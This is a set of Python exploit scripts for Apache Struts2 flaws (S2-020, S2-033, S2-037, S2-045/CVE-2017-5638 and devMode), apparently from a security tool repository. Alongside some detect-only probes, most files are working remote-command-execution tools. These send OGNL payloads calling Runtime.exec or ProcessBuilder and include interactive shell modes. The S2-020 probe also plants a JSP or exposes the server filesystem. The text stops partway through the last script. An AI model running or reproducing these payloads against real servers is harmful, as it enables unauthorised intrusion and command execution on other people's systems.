# S2-020_POC.py
```python
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import argparse
from urlparse import urlparse, urlunparse, urljoin
import time
import requests as req
import traceback
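class WavsPlugin():
    """S2-020 (Struts2 ClassLoader manipulation) check for Tomcat-hosted apps.

    WARNING: this is not a read-only probe.  Every request rewrites live Tomcat
    state through ``class.classLoader.*`` parameters and the changes outlive the
    scan:

    * Tomcat 8: the AccessLogValve is re-pointed (directory/prefix/suffix/
      fileDateFormat) so access-log lines are written to
      ``webapps/ROOT/S2020POC1.jsp``, then a JSP snippet is injected through the
      ``poc`` query parameter.  The valve keeps logging into that JSP - and the
      JSP stays reachable - until the valve is reset and the file removed.
    * Tomcat 6/7: a ``/S2020`` alias is added that exposes ``C:/Windows/`` or
      ``/`` under the application's context root to anyone, not just the tester.

    Use only with authorisation and clean up afterwards.
    """

    # Canary the Tomcat 8 probe plants in the JSP and later looks for.
    _TOM8_CANARY = "This_Site_Is_Vulnerable_S2020"

    def __init__(self, url):
        """Remember the target action URL; no network activity happens here."""
        self.url = url
        self.headers = None  # filled in by verity()
        self.banner = u'''\
# POC Name : Struts2 S2-020漏洞检测POC
# Author : CF_HB
# Date : 2016/06/02
# Refere : http://drops.wooyun.org/papers/1377
#用法: python S2-020_POC.py -url http://121.42.xxx.xxx:8081/xxx/xxx.action
#POC适用范围: Tomcat6.x,Tomcat7.x,Tomcat8.x 更低的5.x,4.x没有测试环境#
结果:
存在漏洞:
[Congratulations!!!]
http://121.42.xxx.xxx:8081/xxx/xxx.action is vulnerable S2-020.
浏览器访问验证-Windows目标:http://121.42.xxx.xxx:8081/xxx/S2020/explorer.exe
浏览器访问验证-Linux目标:http://121.42.xxx.xxx:8081/xxx//S2020/etc/passwd
不存在漏洞:
[sorry!!]
http://www.csu.wsu.cn/index.php is no vulnerable..
'''

    def _report_vulnerable(self):
        """Print the positive verdict (the Linux branch used to call an undefined self._report)."""
        print("[Congratulations!!!]")
        print("{url} is vulnerable S2-020.".format(url=self.url))

    def verity(self):
        """Run the Tomcat 8, Tomcat 6/7-Windows and Tomcat 6/7-Linux probes in turn.

        Prints the verdict and returns True as soon as one probe confirms the
        vulnerability, False otherwise (including when the target is unreachable).
        """
        print(self.banner)
        print("[Checking] " + self.url)
        org_url = self.url
        urlinfo = urlparse(org_url)
        # Server root: the Tomcat 8 probe writes into webapps/ROOT.
        tom8_check_url = urlunparse((urlinfo.scheme, urlinfo.netloc, '/', '', '', ''))
        # Context root (first path segment): the Tomcat 6/7 alias hangs off it.
        # A URL with no path used to raise IndexError here and be reported as a connection failure.
        segments = urlinfo.path.split('/')
        context = segments[1] if len(segments) > 1 else ''
        tom6x7x_url_two = urlunparse((urlinfo.scheme, urlinfo.netloc, context, '', '', ''))
        # netloc (not hostname) so a non-default port such as :8081 is kept in Host.
        self.headers = {
            'Host': urlinfo.netloc,
            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;)',
            'Referer': self.url,
            'banner': 's2-020 poc from cf_hb.'
        }
        # Tomcat 8.x, Linux + Windows: point the access log at a JSP, then inject into it.
        poc_tom8 = [
            "?class.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT",
            "?class.classLoader.resources.context.parent.pipeline.first.prefix=S2020POC",
            "?class.classLoader.resources.context.parent.pipeline.first.suffix=.jsp",
            "?class.classLoader.resources.context.parent.pipeline.first.fileDateFormat=1",
            '?poc=<%out.write("This_Site_Is_Vulnerable_S2020");%>',
        ]
        # Tomcat 6.x/7.x: map /S2020 onto the filesystem through dirContext aliases.
        poc_win_tom6x7x = ["?class.classLoader.resources.dirContext.aliases=/S2020=C://Windows/"]
        poc_linux_tom6x7x = ["?class.classLoader.resources.dirContext.aliases=/S2020=/"]
        try:
            for poc_add in poc_tom8:
                req.get(urljoin(org_url, poc_add), headers=self.headers, timeout=3)
                time.sleep(1)
            checkurl = urljoin(tom8_check_url, "S2020POC1.jsp")
            # Log flushing is not immediate; poll 5 times, 1 s apart, to avoid a false negative.
            for _ in range(5):
                resp = req.get(checkurl, headers=self.headers, timeout=3)
                time.sleep(1)
                # status_code alone is always truthy - the 200 check was missing.
                if resp.status_code == 200 and self._TOM8_CANARY in resp.content:
                    self._report_vulnerable()
                    return True
            # Tomcat 6.x/7.x - Windows: the alias must serve a real explorer.exe (> 1 KB).
            for poc_add in poc_win_tom6x7x:
                req.get(urljoin(org_url, poc_add), headers=self.headers, timeout=3)
                time.sleep(1)
            resp = req.head(tom6x7x_url_two + "/S2020/explorer.exe", headers=self.headers, timeout=3)
            if resp.status_code == 200:
                size = resp.headers.get('Content-Length')
                # A missing Content-Length used to crash int(None) and be swallowed as a connection error.
                if size is not None and int(size) // 1024 > 1:
                    print("[Congratulations!!!!!]")
                    print("{url} is vulnerable S2-020.".format(url=self.url))
                    return True
            # Tomcat 6.x/7.x - Linux: the alias must expose /etc/passwd.
            for poc_add in poc_linux_tom6x7x:
                req.get(urljoin(org_url, poc_add), headers=self.headers, timeout=3)
                time.sleep(1)
            resp = req.get(tom6x7x_url_two + "/S2020/etc/passwd", headers=self.headers, timeout=3)
            if resp.status_code == 200 and ("/bin/bash" in resp.content or "root:x:0:0:root:/root" in resp.content):
                self._report_vulnerable()
                return True
        except req.RequestException as exc:
            print("Failed to connection target, try again..")
            print("[Error] %s" % exc)
            return False
        print("[sorry!!]")
        print("{url} is no vulnerable..".format(url=self.url))
        return False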
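if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-url', help='the target url.')
    args = parser.parse_args()
    if args.url is None:
        # print_usage() writes to stdout itself; wrapping it in print used to append a stray "None".
        parser.print_usage()
        exit(0)
    # Transport errors are handled inside verity(); anything else is a real bug
    # and should show a traceback rather than the (misleading) usage line.
    WavsPlugin(args.url).verity()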
```
# S2-033_CmdToolExP.py
```python
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import requests
import argparse
# Usage text shown by the CLI entry point (user-facing output, kept verbatim).
banner = u'''\
# S2-033 CmdToolExP
# Author:CF_HB
# 时间:2016年6月7日
# 参考:http://zone.wooyun.org/content/27732
#使用说明:
# 1、检测
python S2-033_CmdToolExP.py -u http://xxx.xxx.xxx.xxx/xx/ -check yes
2、交互式执行命令
python S2-033_CmdToolExP.py -u http://xxx.xxx.xxx.xxx/xx/ -shell yes
3、执行一条命令:在无交互式环境或不方便查看回显数据时使用
python S2-033_CmdToolExP.py -u http://xxx.xxx.xxx.xxx/xx/ -command "net user "
# ~$ id
# ======================================================
# uid=0(root) gid=0(root) groups=0(root)
#
# ======================================================
# ~$ pwd
# ======================================================
# /
# ======================================================
# ~$ q 退出
# ======================================================
'''

# Detection payload (OGNL in the method/path segment, ".json" suffix).  The
# target evaluates content+602+53718 as string concatenation and writes
# "290860253718" to the response; nothing is executed.
s2033_poc = (
    "/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,"
    "%23wr%3d%23context[%23parameters.obj[0]].getWriter(),"
    "%23wr.print(%23parameters.content[0]%2b602%2b53718),%23wr.close(),xx.toString.json"
    "?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908"
)

# Command-execution payload: Runtime.exec(#parameters.command[0]) with stdout
# copied into the response.  "ShowMeCommand" is the placeholder swapped at run time.
cmd_exp = (
    "/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,"
    "%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime()"
    ".exec(%23parameters.command[0]).getInputStream()),"
    "%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),"
    "%23xx.toString.json"
    "?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=ShowMeCommand"
)

# Static request headers.  The JSESSIONID is a fixed dummy value and the
# referer is spoofed; both are an easy fingerprint in the target's logs.
headers = {
    'user-agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
    'Cookie': 'JSESSIONID=75C9ED1CD9345875BC5328D73DC76812',
    'referer': 'http://www.baidu.com/',
}
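# Percent-encode the operator's command before it is spliced into the query
# string: '&', '#', '%', '+' and whitespace would otherwise be parsed as part of
# the URL / OGNL instead of reaching Runtime.exec() intact.
try:
    from urllib import quote as _url_quote          # Python 2
except ImportError:
    from urllib.parse import quote as _url_quote    # Python 3


def verity(url):
    """Send the S2-033 canary PoC to *url* and return True if the canary is echoed back.

    The payload makes the target evaluate ``content + 602 + 53718`` as OGNL
    string concatenation and write it to the response; a vulnerable host replies
    with the bare string "290860253718" (12 bytes).  The tight body-length bound
    rejects a normal page that merely contains those digits.  Nothing is
    executed on the target by this probe.  Transport errors are reported on
    stdout and count as False.
    """
    poc_url = url + s2033_poc
    print("." * len(url))
    print("[checking] " + url)
    print("." * len(url))
    try:
        res = requests.post(poc_url, timeout=4)
    except requests.RequestException as exc:
        print("Failed to connection target, try again..")
        print("[Error] %s" % exc)
        return False
    return (res.status_code == 200
            and "290860253718" in res.content
            and len(res.content) < 14)  # bare canary is 12 bytes


def _run_command(exp_url, command):
    """Fire *command* through the S2-033 RCE payload and print the raw response body.

    Returns True when the HTTP exchange completed (whatever the target did with
    the command) and False on a transport error.  The OGNL calls
    Runtime.exec(String): the command is split on whitespace with NO shell, so
    pipes, redirects and quoting are not interpreted, and only stdout is read
    back.  The request is a GET, so the full command lands in the target's
    access log.
    """
    target = exp_url + cmd_exp.replace("ShowMeCommand", _url_quote(command, safe=""))
    try:
        print("=" * 80)
        print("[Result]")
        print("_" * 80)
        r = requests.get(target, headers=headers, timeout=5)
        print(r.text.encode("utf-8"))
        print("=" * 80)
        return True
    except requests.RequestException as exc:
        print("[Error] %s" % exc)
        return False


def cmdTool(exp_url):
    """Interactive loop: read commands from stdin and run each one; 'q' or EOF exits."""
    while True:
        try:
            comm = raw_input("~$ ")
        except EOFError:
            exit(0)
        if comm == "q":
            exit(0)
        if not _run_command(exp_url, comm):
            print("error,try again..")


def ExecOneCmd(exp_url, command):
    """Run a single *command* (non-interactive use); True on success, False on transport error."""
    return _run_command(exp_url, command)


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', help='the target url.', required=True)
    parser.add_argument('-check', help='yes|no', required=False)
    parser.add_argument('-shell', help='get os shell (yes|no)', required=False)
    parser.add_argument('-command', help='one os command', required=False)
    args = parser.parse_args()
    print(banner)
    url = args.u
    if args.check == "yes":
        if verity(url):
            print("{url} is vulnerable S2-033.".format(url=url))
        else:
            print("{url} is no vulnerable..".format(url=url))
        exit(0)
    if args.shell == "yes":
        cmdTool(url)
        exit(0)
    if args.command is not None:
        ExecOneCmd(url, args.command)
        exit(0)
    # print_usage() writes to stdout itself; wrapping it in print used to append "None".
    parser.print_usage()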
```
# S2-033_PoC.py
```
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# S2-033 POC
# Author: CF_HB
# 时间:2016年6月6日
# 漏洞编号:CVE-2016-3087 (S2-033)
# 漏洞详情:http://blog.nsfocus.net/apache-struts2-vulnerability-technical-analysis-protection-scheme-s2-033/
import requests
import argparse

# Usage text; verity() prints it before each check.
banner = u'''\
# S2-033 POC
# Author:CF_HB
# 时间:2016年6月6日
#使用说明:
# 1、检测
python S2-033_PoC.py -u http://xxx.xxx.xxx.xxx/xx/
'''
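def verity(url):
    """Send the S2-033 canary PoC to *url*, print the verdict and return it.

    The payload makes the target evaluate ``content + 602 + 53718`` as OGNL
    string concatenation and write the result to the response.  A vulnerable
    host answers with the bare string "290860253718" (12 bytes), hence the tight
    body-length bound: a page that merely contains the digits is rejected.  The
    probe is non-destructive - nothing is executed on the target.

    Returns True when the canary came back, False otherwise; transport errors
    are reported on stdout and count as False.
    """
    s2033_poc = "/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23parameters.content[0]%2b602%2b53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908"
    print(banner)
    print("[checking] " + url)
    try:
        res = requests.post(url + s2033_poc, timeout=4)
    except requests.RequestException as exc:
        print("Failed to connection target, try again..")
        print("[Error] %s" % exc)
        return False
    vulnerable = (res.status_code == 200
                  and "290860253718" in res.content
                  and len(res.content) < 14)  # bare canary is 12 bytes
    if vulnerable:
        print("{url} is vulnerable S2-033.".format(url=url))
    else:
        print("{url} is not vulnerable..".format(url=url))
    return vulnerable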
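parser = argparse.ArgumentParser()
parser.add_argument('-u', help='the target url.')
args = parser.parse_args()
if args.u is None:
    # Running without -u used to exit silently; show the usage line instead.
    parser.print_usage()
    exit(-1)
verity(args.u)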
```
# S2-037_CmdToolExP.py
```
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import requests
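import argparse

# Usage text shown by the CLI entry point.  The WeChat reference link used to
# carry the author's per-session `key`, `uin`, `devicetype`, `version`,
# `ascene` and `pass_ticket` parameters; those are credentials/identifiers,
# not part of the article address, and have been dropped.
banner = u'''\
# S2-037 CmdToolExP
# Author:CF_HB
# 时间:2016年6月15日
# 参考:https://mp.weixin.qq.com/s?__biz=MzAwNTYwMjM3Mw==&mid=2651680334&idx=1&sn=5c9adb02a1c11d9bbff3ffddb639d62f&scene=1&srcid=06155PRaQh7SaMEXd9Gm8hJz
# 参考:http://zone.wooyun.org/content/27865
#使用说明:
# 1、检测
python S2-037_CmdToolExP.py -u http://xxx.xxx.xxx.xxx/xx/ -check yes
2、交互式执行命令
python S2-037_CmdToolExP.py -u http://xxx.xxx.xxx.xxx/xx/ -shell yes
3、执行一条命令:在无交互式环境或不方便查看回显数据时使用
python S2-037_CmdToolExP.py -u http://xxx.xxx.xxx.xxx/xx/ -command "net user "
# ~$ id
# ======================================================
# uid=0(root) gid=0(root) groups=0(root)
#
# ======================================================
# ~$ pwd
# ======================================================
# /
# ======================================================
# ~$ q 退出
# ======================================================
'''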
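# Detection payload: sets #_memberAccess to DEFAULT_MEMBER_ACCESS inside a
# conditional, then println()s the 32-char canary from `content` into the
# response (34 bytes with CRLF).  Nothing is executed on the target.
s2037_poc = "/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23parameters.content[0]),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=25F9E794323B453885F5181F1B624D0B"

# Command-execution payload: Runtime.exec(#parameters.command[0]) with stdout
# written to the response.  "ShowMeCommand" is the placeholder swapped at run time.
cmd_exp = "/(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=ShowMeCommand"

# Static request headers.  The JSESSIONID is a fixed dummy value and the
# referer is spoofed; both are an easy fingerprint in the target's logs.
headers = {
    'user-agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
    'Cookie': 'JSESSIONID=75C9ED1CD9345875BC5328D73DC76812',
    'referer': 'http://www.baidu.com/',
}

# Percent-encode the operator's command before it is spliced into the query
# string: '&', '#', '%', '+' and whitespace would otherwise be parsed as part of
# the URL / OGNL instead of reaching Runtime.exec() intact.
try:
    from urllib import quote as _url_quote          # Python 2
except ImportError:
    from urllib.parse import quote as _url_quote    # Python 3


def verity(url):
    """Send the S2-037 canary PoC to *url* and return True if the canary is echoed back.

    A vulnerable host answers with just the canary plus a line break (~34
    bytes); the body-length bound rejects a normal page that merely contains
    the hex string.  Transport errors are reported on stdout and count as False.
    """
    poc_url = url + s2037_poc
    print("." * len(url))
    print("[checking] " + url)
    print("." * len(url))
    try:
        res = requests.post(poc_url, timeout=4)
    except requests.RequestException as exc:
        print("Failed to connection target, try again..")
        print("[Error] %s" % exc)
        return False
    return (res.status_code == 200
            and "25F9E794323B453885F5181F1B624D0B" in res.content
            and len(res.content) < 40)  # canary + newline is ~34 bytes


def _run_command(exp_url, command):
    """Fire *command* through the S2-037 RCE payload and print the raw response body.

    Returns True when the HTTP exchange completed (whatever the target did with
    the command) and False on a transport error.  The OGNL calls
    Runtime.exec(String): the command is split on whitespace with NO shell, so
    pipes, redirects and quoting are not interpreted, and only stdout is read
    back.  The request is a GET, so the full command lands in the target's
    access log.
    """
    target = exp_url + cmd_exp.replace("ShowMeCommand", _url_quote(command, safe=""))
    try:
        print("=" * 80)
        print("[Result]")
        print("_" * 80)
        r = requests.get(target, headers=headers, timeout=5)
        print(r.text.encode("utf-8"))
        print("=" * 80)
        return True
    except requests.RequestException as exc:
        print("[Error] %s" % exc)
        return False


def cmdTool(exp_url):
    """Interactive loop: read commands from stdin and run each one; 'q' or EOF exits."""
    while True:
        try:
            comm = raw_input("~$ ")
        except EOFError:
            exit(0)
        if comm == "q":
            exit(0)
        if not _run_command(exp_url, comm):
            print("error,try again..")


def ExecOneCmd(exp_url, command):
    """Run a single *command* (non-interactive use); True on success, False on transport error."""
    return _run_command(exp_url, command)


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', help='the target url.', required=True)
    parser.add_argument('-check', help='yes|no', required=False)
    parser.add_argument('-shell', help='get os shell (yes|no)', required=False)
    parser.add_argument('-command', help='one os command', required=False)
    args = parser.parse_args()
    print(banner)
    url = args.u
    if args.check == "yes":
        if verity(url):
            print("{url} is vulnerable S2-037.".format(url=url))
        else:
            print("{url} is no vulnerable..".format(url=url))
        exit(0)
    if args.shell == "yes":
        cmdTool(url)
        exit(0)
    if args.command is not None:
        ExecOneCmd(url, args.command)
        exit(0)
    # print_usage() writes to stdout itself; wrapping it in print used to append "None".
    parser.print_usage()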
```
# S2-037_PoC.py
```
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# S2-037 POC
# Author: CF_HB
# 来源:http://zone.wooyun.org/content/27865
# 时间:2016年6月15日
import requests
import argparse

# Usage text; verity() prints it before each check.
banner = u'''\
# S2-037 POC
# Author:CF_HB
# 时间:2016年6月15日
#使用说明:
# 1、检测
python S2-037_PoC.py -u http://xxx.xxx.xxx.xxx/xx/
'''
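def verity(url):
    """Send the S2-037 canary PoC to *url*, print the verdict and return it.

    The payload println()s the 32-char canary from the `content` parameter
    into the response, so a vulnerable host answers with roughly 34 bytes; the
    body-length bound rejects a page that merely contains the hex string.  The
    probe is non-destructive.

    Returns True when the canary came back, False otherwise; transport errors
    are reported on stdout and count as False.
    """
    s2037_poc = "/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23parameters.content[0]),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=25F9E794323B453885F5181F1B624D0B"
    print(banner)
    print("[checking] " + url)
    try:
        res = requests.post(url + s2037_poc, timeout=4)
    except requests.RequestException as exc:
        print("Failed to connection target, try again..")
        print("[Error] %s" % exc)
        return False
    vulnerable = (res.status_code == 200
                  and "25F9E794323B453885F5181F1B624D0B" in res.content
                  and len(res.content) < 40)  # canary + newline is ~34 bytes
    if vulnerable:
        print("{url} is vulnerable S2-037.".format(url=url))
    else:
        print("{url} is no vulnerable..".format(url=url))
    return vulnerable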
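parser = argparse.ArgumentParser()
parser.add_argument('-u', help='the target url.')
args = parser.parse_args()
if args.u is None:
    # Running without -u used to exit silently; show the usage line instead.
    parser.print_usage()
    exit(-1)
verity(args.u)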
```
# S2-045_poc_exp.py
```
#!/usr/bin/env python3
# coding=utf-8
# *****************************************************
# struts-pwn: Apache Struts CVE-2017-5638 Exploit
# Author:
# Mazin Ahmed
# This code is based on:
# https://www.exploit-db.com/exploits/41570/
# https://www.seebug.org/vuldb/ssvid-92746
# *****************************************************
import sys
import random
import requests
import argparse
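# Silence urllib3's InsecureRequestWarning: every request in this tool uses
# verify=False on purpose (targets are commonly self-signed).  Narrowed from a
# bare `except:` so only a missing/relocated urllib3 is ignored, not e.g.
# KeyboardInterrupt.
try:
    import requests.packages.urllib3
    requests.packages.urllib3.disable_warnings()
except (ImportError, AttributeError):
    pass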
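if len(sys.argv) <= 1:
    print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
    print('[*] Struts-PWN - @mazen160')
    print('\n%s -h for help.' % (sys.argv[0]))
    exit(0)

parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", dest="url", help="Check a single URL.", action='store')
parser.add_argument("-l", "--list", dest="usedlist", help="Check a list of URLs.", action='store')
parser.add_argument("-c", "--cmd", dest="cmd", help="Command to execute. (Default: id)",
                    action='store', default='id')
parser.add_argument("--check", dest="do_check", help="Check if a target is vulnerable.",
                    action='store_true')
args = parser.parse_args()

# Module-level options; main() picks them up as its default arguments.
url = args.url if args.url else None
usedlist = args.usedlist if args.usedlist else None
cmd = args.cmd if args.cmd else None
do_check = args.do_check if args.do_check else None


def url_prepare(url):
    """Percent-encode '#' and ' ' in *url* and default the scheme to http://."""
    url = url.replace('#', '%23').replace(' ', '%20')
    if '://' not in url:
        url = 'http://' + url
    return url


def _ognl_quote(text):
    """Escape *text* for embedding in a single-quoted OGNL string literal.

    A backslash or single quote in the command used to terminate the literal
    and break the whole payload.
    """
    return text.replace('\\', '\\\\').replace("'", "\\'")


def exploit(url, cmd):
    """Run *cmd* on *url* via the S2-045 Content-Type OGNL injection; return the raw response body.

    The payload installs DEFAULT_MEMBER_ACCESS (clearing the excluded
    package/class lists), picks cmd.exe or /bin/bash from os.name, starts the
    command with ProcessBuilder (stderr merged into stdout) and copies its
    output into the HTTP response.  The whole payload travels in the
    Content-Type header, so *cmd* must not contain CR/LF.  Returns 'ERROR' when
    the request itself fails.

    Proxies come from HTTP_PROXY/HTTPS_PROXY in the environment (requests'
    default).  The previous hard-wired 127.0.0.1:8080 proxy made every run fail
    unless an intercepting proxy happened to be listening, and check() never
    used it.
    """
    url = url_prepare(url)
    print('\n[*] URL: %s' % (url))
    print('[*] CMD: %s' % (cmd))
    payload = "%{(#_='multipart/form-data')."
    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    payload += "(#cmd='%s')." % _ognl_quote(cmd)
    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}"
    headers = {
        # 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)',
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
        'Content-Type': payload,
        'Accept': '*/*'
    }
    timeout = 3
    try:
        output = requests.get(url, headers=headers, verify=False, timeout=timeout,
                              allow_redirects=False).text
    except Exception as e:
        print("EXCEPTION::::--> " + str(e))
        output = 'ERROR'
    return output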
def check(url):
    """Return True if *url* reflects an injected response header through the S2-045 Content-Type sink.

    Non-destructive: the payload only asks the target to add a random header
    whose name equals its value, so a match cannot come from a canned page.
    Any transport error is printed and counts as "not affected".
    """
    url = url_prepare(url)
    print('\n[*] URL: %s' % (url))
    marker = ''.join(random.choice('abcdefghijklmnopqrstuvwxyz') for _ in range(7))
    ognl = ("%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']."
            "addHeader('" + marker + "','" + marker + "')}.multipart/form-data")
    request_headers = {
        # 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)',
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
        'Content-Type': ognl,
        'Accept': '*/*'
    }
    try:
        resp = requests.get(url, headers=request_headers, verify=False, timeout=3,
                            allow_redirects=False)
    except Exception as e:
        print("EXCEPTION::::--> " + str(e))
        return False
    # Header lookup is case-insensitive in requests; the value must echo the marker exactly.
    return resp.headers.get(marker) == marker
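def _report(target, cmd, do_check):
    """Check or exploit one target and print the outcome."""
    if do_check:
        # Only test for the vulnerability; nothing is executed on the target.
        verdict = 'Vulnerable!' if check(target) is True else 'Not Affected.'
        print('[*] Status: ' + verdict)
    else:
        print(exploit(target, cmd))


def _read_targets(path):
    """Return the non-empty lines of the URL list at *path* (CRs stripped).

    The previous version removed only the first blank line, so any further
    blank line became the target '' (i.e. http://) and produced an error.
    """
    with open(str(path), 'r') as f_file:
        return [line for line in f_file.read().replace('\r', '').split('\n') if line]


def main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check):
    """Entry point: act on the single --url and/or on every URL in --list, then print a footer.

    Defaults are bound from the module-level option variables at definition time.
    """
    if url:
        _report(url, cmd, do_check)
    if usedlist:
        try:
            targets = _read_targets(usedlist)
        except (IOError, OSError):
            print('Error: There was an error in reading list file.')
            exit(1)
        for target in targets:
            _report(target, cmd, do_check)
    print('[%] Done.')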
if __name__ == '__main__':
    # Ctrl-C is the normal way to abandon a long list scan; report it and exit cleanly.
    try:
        main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check)
    except KeyboardInterrupt:
        print('\nKeyboardInterrupt Detected.')
        print('Exiting...')
        exit(0)
```
# S2-DevMode_CmdToolExP.py
```python
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import requests
import argparse
# Usage text shown by the CLI entry point (user-facing output, kept verbatim).
banner = u'''\
# S2_DevMode_RCE CmdToolExP
# Author:CF_HB
# 时间:2016年7月14日
# 参考:http://zone.wooyun.org/content/28441
#使用说明:
# 1、检测
python S2_DevMode_RCE_CmdToolExP.py -u http://xxx.xxx.xxx.xxx/xxxx.action -check yes
2、交互式执行命令
python S2_DevMode_RCE_CmdToolExP.py -u http://xxx.xxx.xxx.xxx/xxxx.action -shell yes
3、执行一条命令:在无交互式环境或不方便查看回显数据时使用
python S2_DevMode_RCE_CmdToolExP.py -u http://xxx.xxx.xxx.xxx/xxxx.action -command "net user "
# ~$ id
# ======================================================
# uid=0(root) gid=0(root) groups=0(root)
#
# ======================================================
# ~$ pwd
# ======================================================
# /
# ======================================================
# ~$ q 退出
# ======================================================
'''

# Detection payload for the devMode debugging interceptor (`debug=browser`):
# `object` is evaluated as OGNL and println()s the 32-char canary in `content`
# to the response.  Nothing is executed on the target.
S2_DevMode_POC = (
    "?debug=browser&object=(%23mem=%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
    "%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json"
    "&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=25F9E794323B453885F5181F1B624D0B"
)

# Command-execution payload: Runtime.exec(#parameters.command[0]) with stdout
# written to the response.  "ShowMeCommand" is the placeholder swapped at run time.
cmd_exp = (
    "?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
    "%3f(%23context[%23parameters.rpsobj[0]].getWriter().println("
    "@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime()"
    ".exec(%23parameters.command[0]).getInputStream()))):xx.toString.json"
    "&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789&command=ShowMeCommand"
)

# Static request headers.  The JSESSIONID is a fixed dummy value and the
# referer is spoofed; both are an easy fingerprint in the target's logs.
headers = {
    'user-agent': 'Mozilla/3.0 (Windows NT 4.3; WOW64; rv:15.0) Gecko/2102101 Firefox/45.0',
    'Cookie': 'JSESSIONID=75C9ED1CD9345875BC5328D73DC76812',
    'referer': 'http://www.baidu.com/',
}
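# Percent-encode the operator's command before it is spliced into the query
# string: '&', '#', '%', '+' and whitespace would otherwise be parsed as part of
# the URL / OGNL instead of reaching Runtime.exec() intact.
try:
    from urllib import quote as _url_quote          # Python 2
except ImportError:
    from urllib.parse import quote as _url_quote    # Python 3


def verity(url):
    """Send the devMode canary PoC to *url* and return True if the canary is echoed back.

    A vulnerable host (struts.devMode on, `debug=browser` honoured) answers with
    just the 32-char canary plus a line break (~34 bytes); the body-length bound
    rejects a normal page that merely contains the hex string.  Transport errors
    are reported on stdout and count as False.
    """
    poc_url = url + S2_DevMode_POC
    print("." * len(url))
    print("[checking] " + url)
    print("." * len(url))
    try:
        res = requests.post(poc_url, timeout=4)
    except requests.RequestException as exc:
        print("Failed to connection target, try again..")
        print("[Error] %s" % exc)
        return False
    return (res.status_code == 200
            and "25F9E794323B453885F5181F1B624D0B" in res.content
            and len(res.content) < 40)  # canary + newline is ~34 bytes


def _run_command(exp_url, command):
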